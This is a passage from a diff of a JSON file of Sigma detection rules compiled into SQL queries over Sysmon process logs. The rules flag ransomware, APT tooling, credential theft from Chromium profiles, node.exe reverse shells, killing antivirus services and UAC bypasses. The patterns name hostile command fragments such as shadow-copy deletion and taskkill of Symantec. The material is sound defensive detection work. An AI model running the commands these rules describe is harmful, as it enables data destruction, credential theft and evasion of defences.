Shelton", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Case in which administrators are allowed to use ScreenConnect's Backstage mode" + "Administrative scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%ScreenConnect.ClientService.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\%TEMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%TMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%LocalAppData\\%\\\\Temp%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% >%' ESCAPE '\\' OR CommandLine LIKE '%Out-File%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-Json%' ESCAPE '\\' OR CommandLine LIKE '%-WindowStyle hidden -Verb runAs%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\system32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Temp\\\\Amazon\\\\EC2-Windows\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_remote_access_tools_screenconnect_anomaly.yml" + "filename": "proc_creation_win_susp_script_exec_from_temp.yml" }, { - "title": "ETW Logging Tamper In .NET Processes", - "id": "41421f44-58f9-455d-838a-c398859841d4", - "status": "test", - "description": "Detects changes to environment variables related to ETW logging. This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Potential Arbitrary Code Execution Via Node.EXE", + "id": "6640f31c-01ad-49b5-beb5-83498a5cd8bd", + "status": "experimental", + "description": "Detects the execution node.exe which is shipped with multiple software such as VMware, Adobe...etc. In order to execute arbitrary code. For example to establish reverse shell as seen in Log4j attacks...etc", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562" + "attack.t1127" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%COMPlus\\_ETWEnabled%' ESCAPE '\\' OR CommandLine LIKE '%COMPlus\\_ETWFlags%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\node.exe' ESCAPE '\\' AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% --eval %' ESCAPE '\\') AND CommandLine LIKE '%.exec(%' ESCAPE '\\' AND CommandLine LIKE '%net.socket%' ESCAPE '\\' AND CommandLine LIKE '%.connect%' ESCAPE '\\' AND CommandLine LIKE '%child\\_process%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_etw_modification_cmdline.yml" + "filename": "proc_creation_win_node_abuse.yml" }, { - "title": "Deny Service Access Using Security Descriptor Tampering Via Sc.EXE", - "id": "99cf1e02-00fb-4c0d-8375-563f978dfd37", - "status": "test", - "description": "Detects suspicious DACL modifications to deny access to a service that affects critical trustees. This can be used to hide services or make them unstoppable.", - "author": "Jonhnathan Ribeiro, oscd.community", + "title": "SQLite Chromium Profile Data DB Access", + "id": "24c77512-782b-448a-8950-eddb0785fc71", + "status": "experimental", + "description": "Detect usage of the \"sqlite\" binary to query databases in Chromium-based browsers for potential data stealing.", + "author": "TropChaud", "tags": [ - "attack.persistence", - "attack.t1543.003" + "attack.credential_access", + "attack.t1539", + "attack.t1555.003", + "attack.collection", + "attack.t1005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%D;%' ESCAPE '\\') AND (CommandLine LIKE '%;IU%' ESCAPE '\\' OR CommandLine LIKE '%;SU%' ESCAPE '\\' OR CommandLine LIKE '%;BA%' ESCAPE '\\' OR CommandLine LIKE '%;SY%' ESCAPE '\\' OR CommandLine LIKE '%;WD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product = 'SQLite' OR (Image LIKE '%\\\\sqlite.exe' ESCAPE '\\' OR Image LIKE '%\\\\sqlite3.exe' ESCAPE '\\')) AND (CommandLine LIKE '%\\\\User Data\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Opera Software\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ChromiumViewer\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%Login Data%' ESCAPE '\\' OR CommandLine LIKE '%Cookies%' ESCAPE '\\' OR CommandLine LIKE '%Web Data%' ESCAPE '\\' OR CommandLine LIKE '%History%' ESCAPE '\\' OR CommandLine LIKE '%Bookmarks%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sc_sdset_deny_service_access.yml" + "filename": "proc_creation_win_sqlite_chromium_profile_data.yml" }, { - "title": "Network Reconnaissance Activity", - "id": "e6313acd-208c-44fc-a0ff-db85d572e90e", - "status": "test", - "description": "Detects a set of suspicious network related commands often used in recon stages", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Whoami.EXE Execution From Privileged Process", + "id": "79ce34ca-af29-4d0e-b832-fc1b377020db", + "status": "experimental", + "description": "Detects the execution of \"whoami.exe\" by privileged accounts that are often abused by threat actors", + "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov", "tags": [ + "attack.privilege_escalation", "attack.discovery", - "attack.t1087", - "attack.t1082", - "car.2016-03-001" + "attack.t1033" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%nslookup%' ESCAPE '\\' AND CommandLine LIKE '%\\_ldap.\\_tcp.dc.\\_msdcs.%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'whoami.exe' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\' OR User LIKE '%TrustedInstaller%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_nslookup_domain_discovery.yml" + "filename": "proc_creation_win_whoami_execution_from_high_priv_process.yml" }, { - "title": "Suspicious Whoami.EXE Execution", - "id": "c30fb093-1109-4dc8-88a8-b30d11c95a5d", - "status": "experimental", - "description": "Detects the execution of \"whoami.exe\" with the \"/all\" flag or with redirection options to export the results to a file for later use.", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious PrinterPorts Creation (CVE-2020-1048)", + "id": "cc08d590-8b90-413a-aff6-31d1a99678d7", + "status": "test", + "description": "Detects new commands that add new printer port which point to suspicious file", + "author": "EagleEye Team, Florian Roth", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.persistence", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "New printer port install on host" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% -all%' ESCAPE '\\' OR CommandLine LIKE '% /all%' ESCAPE '\\' OR CommandLine LIKE '% /FO CSV%' ESCAPE '\\' OR CommandLine LIKE '% -FO CSV%' ESCAPE '\\')) OR (CommandLine LIKE '%whoami%' ESCAPE '\\' AND CommandLine LIKE '%>%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%Add-PrinterPort -Name%' ESCAPE '\\' AND (CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\')) OR CommandLine LIKE '%Generic / Text Only%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_whoami_susp_flags.yml" + "filename": "proc_creation_win_exploit_cve_2020_1048.yml" }, { - "title": "PUA - Chisel Tunneling Tool Execution", - "id": "8b0e12da-d3c3-49db-bb4f-256703f380e5", - "status": "experimental", - "description": "Detects usage of the Chisel tunneling tool via the commandline arguments", + "title": "Potential Maze Ransomware Activity", + "id": "29fd07fc-9cfd-4331-b7fd-cc18dfa21052", + "status": "test", + "description": "Detects specific process characteristics of Maze ransomware word document droppers", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090.001" - ], - "falsepositives": [ - "Some false positives may occur with other tools with similar commandlines" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\chisel.exe' ESCAPE '\\' OR ((CommandLine LIKE '%exe client %' ESCAPE '\\' OR CommandLine LIKE '%exe server %' ESCAPE '\\') AND (CommandLine LIKE '%-socks5%' ESCAPE '\\' OR CommandLine LIKE '%-reverse%' ESCAPE '\\' OR CommandLine LIKE '% r:%' ESCAPE '\\' OR CommandLine LIKE '%:127.0.0.1:%' ESCAPE '\\' OR CommandLine LIKE '%-tls-skip-verify %' ESCAPE '\\' OR CommandLine LIKE '%:socks%' ESCAPE '\\'))))" - ], - "filename": "proc_creation_win_pua_chisel.yml" - }, - { - "title": "Potential PlugX Activity", - "id": "aeab5ec5-be14-471a-80e8-e344418305c2", - "status": "test", - "description": "Detects the execution of an executable that is typically used by PlugX for DLL side loading starting from an uncommon location", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.s0013", - "attack.defense_evasion", - "attack.t1574.002" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((((((((((Image LIKE '%\\\\CamMute.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Lenovo\\\\Communication Utility\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Lenovo\\\\Communications Utility\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\chrome\\_frame\\_helper.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Google\\\\Chrome\\\\application\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\dvcemumanager.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Microsoft Device Emulator\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\Gadget.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Windows Media Player\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\hcc.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\HTML Help Workshop\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\hkcmd.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\SysNative\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\SysWow64\\\\%' ESCAPE '\\')))) OR (Image LIKE '%\\\\Mc.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Kit%' ESCAPE '\\')))) OR (Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Defender\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\AntiMalware\\\\%' ESCAPE '\\')))) OR (Image LIKE '%\\\\msseces.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Security Center\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft Security Essentials\\\\%' ESCAPE '\\')))) OR (Image LIKE '%\\\\OInfoP11.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Common Files\\\\Microsoft Shared\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\OleView.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Kit%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Resource Kit\\\\%' ESCAPE '\\')))) OR (Image LIKE '%\\\\rc.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Kit%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Resource Kit\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.NET\\\\%' ESCAPE '\\')))))" - ], - "filename": "proc_creation_win_malware_plugx_susp_exe_locations.yml" - }, - { - "title": "Tasks Folder Evasion", - "id": "cc4e02ba-9c06-48e2-b09e-2500cace9ae0", - "status": "test", - "description": "The Tasks folder in system32 and syswow64 are globally writable paths.\nAdversaries can take advantage of this and load or influence any script hosts or ANY .NET Application \nin Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr\n", - "author": "Sreeman", - "tags": [ - "attack.defense_evasion", - "attack.persistence", "attack.execution", - "attack.t1574.002" + "attack.t1204.002", + "attack.t1047", + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%echo %' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%type %' ESCAPE '\\' OR CommandLine LIKE '%file createnew%' ESCAPE '\\') AND (CommandLine LIKE '% C:\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Windows\\\\SysWow64\\\\Tasks\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\WINWORD.exe' ESCAPE '\\' AND Image LIKE '%.tmp' ESCAPE '\\') OR (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%shadowcopy delete' ESCAPE '\\') OR (CommandLine LIKE '%shadowcopy delete' ESCAPE '\\' AND CommandLine LIKE '%\\\\..\\\\..\\\\system32%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_task_folder_evasion.yml" + "filename": "proc_creation_win_malware_maze_ransomware.yml" }, { - "title": "Sofacy Trojan Loader Activity", - "id": "ba778144-5e3d-40cf-8af9-e28fb1df1e20", - "status": "test", - "description": "Detects Trojan loader activity as used by APT28", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "title": "LockerGoga Ransomware Activity", + "id": "74db3488-fd28-480a-95aa-b7af626de068", + "status": "stable", + "description": "Detects LockerGoga ransomware activity via specific command line.", + "author": "Vasiliy Burov, oscd.community", "tags": [ - "attack.g0007", - "attack.execution", - "attack.t1059.003", - "attack.defense_evasion", - "car.2013-10-002", - "attack.t1218.011" + "attack.impact", + "attack.t1486" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\%APPDATA\\%\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.dat\",%' ESCAPE '\\' OR (CommandLine LIKE '%.dll\",#1' ESCAPE '\\' OR CommandLine LIKE '%.dll #1' ESCAPE '\\' OR CommandLine LIKE '%.dll\" #1' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-i SM-tgytutrc -s%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_sofacy.yml" + "filename": "proc_creation_win_malware_lockergoga_ransomware.yml" }, { - "title": "Potential Exploitation Attempt Of Undocumented WindowsServer RCE", - "id": "6d5b8176-d87d-4402-8af4-53aee9db7b5d", + "title": "Kavremover Dropped Binary LOLBIN Usage", + "id": "d047726b-c71c-4048-a99b-2e2f50dc107d", "status": "experimental", - "description": "Detects potential exploitation attempt of undocumented Windows Server Pre Auth Remote Code Execution (RCE)", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", + "description": "Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k DHCPServer%' ESCAPE '\\' AND CommandLine LIKE '%-k DHCPServer%' ESCAPE '\\' AND (User LIKE '%NETWORK SERVICE%' ESCAPE '\\' OR User LIKE '%NETZWERKDIENST%' ESCAPE '\\' OR User LIKE '%SERVIZIO DI RETE%' ESCAPE '\\' OR User LIKE '%SERVICIO DE RED%' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_exploit_other_win_server_undocumented_rce.yml" - }, - { - "title": "New ActiveScriptEventConsumer Created Via Wmic.EXE", - "id": "ebef4391-1a81-4761-a40a-1db446c0e625", - "status": "test", - "description": "Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence", - "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1546.003" - ], - "falsepositives": [ - "Legitimate software creating script event consumers" + "attack.defense_evasion", + "attack.t1127" ], - "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%ActiveScriptEventConsumer%' ESCAPE '\\' AND CommandLine LIKE '% CREATE %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '% run run-cmd %' ESCAPE '\\' AND NOT ((ParentImage LIKE '%\\\\kavremover.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cleanapi.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_eventconsumer_creation.yml" + "filename": "proc_creation_win_lolbin_kavremover.yml" }, { - "title": "Potential Ke3chang/TidePool Malware Activity", - "id": "7b544661-69fc-419f-9a59-82ccc328f205", - "status": "test", - "description": "Detects registry modifications potentially related to the Ke3chang/TidePool malware as seen in campaigns running in 2019 and 2020", - "author": "Markus Neis, Swisscom", + "title": "Taskkill Symantec Endpoint Protection", + "id": "4a6713f6-3331-11ed-a261-0242ac120002", + "status": "experimental", + "description": "Detects one of the possible scenarios for disabling Symantec Endpoint Protection.\nSymantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism.\nAs a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service.\n", + "author": "Ilya Krestinichev, Florian Roth (Nextron Systems)", "tags": [ - "attack.g0004", "attack.defense_evasion", "attack.t1562.001" ], @@ -10299,73 +9981,28 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%-Property DWORD -name DisableFirstRunCustomize -value 2 -Force%' ESCAPE '\\' OR CommandLine LIKE '%-Property String -name Check\\_Associations -value%' ESCAPE '\\' OR CommandLine LIKE '%-Property DWORD -name IEHarden -value 0 -Force%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%taskkill%' ESCAPE '\\' AND CommandLine LIKE '% /F %' ESCAPE '\\' AND CommandLine LIKE '% /IM %' ESCAPE '\\' AND CommandLine LIKE '%ccSvcHst.exe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_ke3chang_tidepool.yml" + "filename": "proc_creation_win_taskkill_sep.yml" }, { - "title": "Potential NTLM Coercion Via Certutil.EXE", - "id": "6c6d9280-e6d0-4b9d-80ac-254701b64916", + "title": "Potential Unquoted Service Path Reconnaissance Via Wmic.EXE", + "id": "68bcd73b-37ef-49cb-95fc-edc809730be6", "status": "experimental", - "description": "Detects possible NTLM coercion via certutil using the 'syncwithWU' flag", + "description": "Detects known WMI recon method to look for unquoted service paths using wmic. Often used by pentester and attacker enumeration scripts", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.t1047" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '% -syncwithWU %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_certutil_ntlm_coercion.yml" - }, - { - "title": "HackTool - DInjector PowerShell Cradle Execution", - "id": "d78b5d61-187d-44b6-bf02-93486a80de5a", - "status": "test", - "description": "Detects the use of the Dinject PowerShell cradle based on the specific flags", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1055" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% /am51%' ESCAPE '\\' AND CommandLine LIKE '% /password%' ESCAPE '\\')" - ], - "filename": "proc_creation_win_hktl_dinjector.yml" - }, - { - "title": "OilRig APT Activity", - "id": "ce6e34ca-966d-41c9-8d93-5b06c8b97a06", - "status": "test", - "description": "Detects OilRig activity as reported by Nyotron in their March 2018 report", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", - "tags": [ - "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", - "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%SC Scheduled Scan%' ESCAPE '\\' AND CommandLine LIKE '%\\\\microsoft\\\\Taskbar\\\\autoit3.exe%' ESCAPE '\\') OR (Image LIKE '%\\\\Windows\\\\Temp\\\\DB\\\\%' ESCAPE '\\' AND Image LIKE '%.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\Service.exe' ESCAPE '\\' AND (CommandLine LIKE '%i%' ESCAPE '\\' OR CommandLine LIKE '%u%' ESCAPE '\\')) OR (ParentImage LIKE '%\\\\local\\\\microsoft\\\\Taskbar\\\\autoit3.exe' ESCAPE '\\' AND CommandLine LIKE '%nslookup.exe%' ESCAPE '\\' AND CommandLine LIKE '%-q=TXT%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'wmic.exe' OR Image LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND (CommandLine LIKE '% service get %' ESCAPE '\\' AND CommandLine LIKE '%name,displayname,pathname,startmode%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_oilrig_mar18.yml" + "filename": "proc_creation_win_wmic_recon_unquoted_service_search.yml" }, { "title": "Potential SMB Relay Attack Tool Execution", @@ -10386,26 +10023,6 @@ ], "filename": "proc_creation_win_hktl_relay_attacks_tools.yml" }, - { - "title": "UAC Bypass WSReset", - "id": "89a9a0e0-f61a-42e5-8957-b1479565a658", - "status": "test", - "description": "Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config", - "author": "Christian Burkard (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wsreset.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" - ], - "filename": "proc_creation_win_uac_bypass_wsreset_integrity_level.yml" - }, { "title": "HackTool - winPEAS Execution", "id": "98b53e78-ebaf-46f8-be06-421aafd176d9", @@ -10428,43 +10045,63 @@ "filename": "proc_creation_win_hktl_winpeas.yml" }, { - "title": "Delete All Scheduled Tasks", - "id": "220457c1-1c9f-4c2e-afe6-9598926222c1", + "title": "Exploiting CVE-2019-1388", + "id": "02e0b2ea-a597-428e-b04a-af6a1a403e5c", + "status": "stable", + "description": "Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.privilege_escalation", + "attack.t1068" + ], + "falsepositives": [ + "Unknown" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\consent.exe' ESCAPE '\\' AND Image LIKE '%\\\\iexplore.exe' ESCAPE '\\' AND CommandLine LIKE '% http%' ESCAPE '\\') AND (IntegrityLevel = 'System' OR (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_exploit_cve_2019_1388.yml" + }, + { + "title": "HackTool - KrbRelay Execution", + "id": "e96253b8-6b3b-4f90-9e59-3b24b99cf9b4", "status": "experimental", - "description": "Detects the usage of schtasks with the delete flag and the asterisk symbole to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of KrbRelay, a Kerberos relaying tool", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1489" + "attack.credential_access", + "attack.t1558.003" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /delete %' ESCAPE '\\' AND CommandLine LIKE '%/tn \\*' ESCAPE '\\' AND CommandLine LIKE '% /f%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\KrbRelay.exe' ESCAPE '\\' OR OriginalFileName = 'KrbRelay.exe') OR (CommandLine LIKE '% -spn %' ESCAPE '\\' AND CommandLine LIKE '% -clsid %' ESCAPE '\\' AND CommandLine LIKE '% -rbcd %' ESCAPE '\\') OR (CommandLine LIKE '%shadowcred%' ESCAPE '\\' AND CommandLine LIKE '%clsid%' ESCAPE '\\' AND CommandLine LIKE '%spn%' ESCAPE '\\') OR (CommandLine LIKE '%spn %' ESCAPE '\\' AND CommandLine LIKE '%session %' ESCAPE '\\' AND CommandLine LIKE '%clsid %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_schtasks_delete_all.yml" + "filename": "proc_creation_win_hktl_krbrelay.yml" }, { - "title": "Hermetic Wiper TG Process Patterns", - "id": "2f974656-6d83-4059-bbdf-68ac5403422f", + "title": "Suspicious Binary In User Directory Spawned From Office Application", + "id": "aa3a6f94-890e-4e22-b634-ffdfd54792cc", "status": "experimental", - "description": "Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects 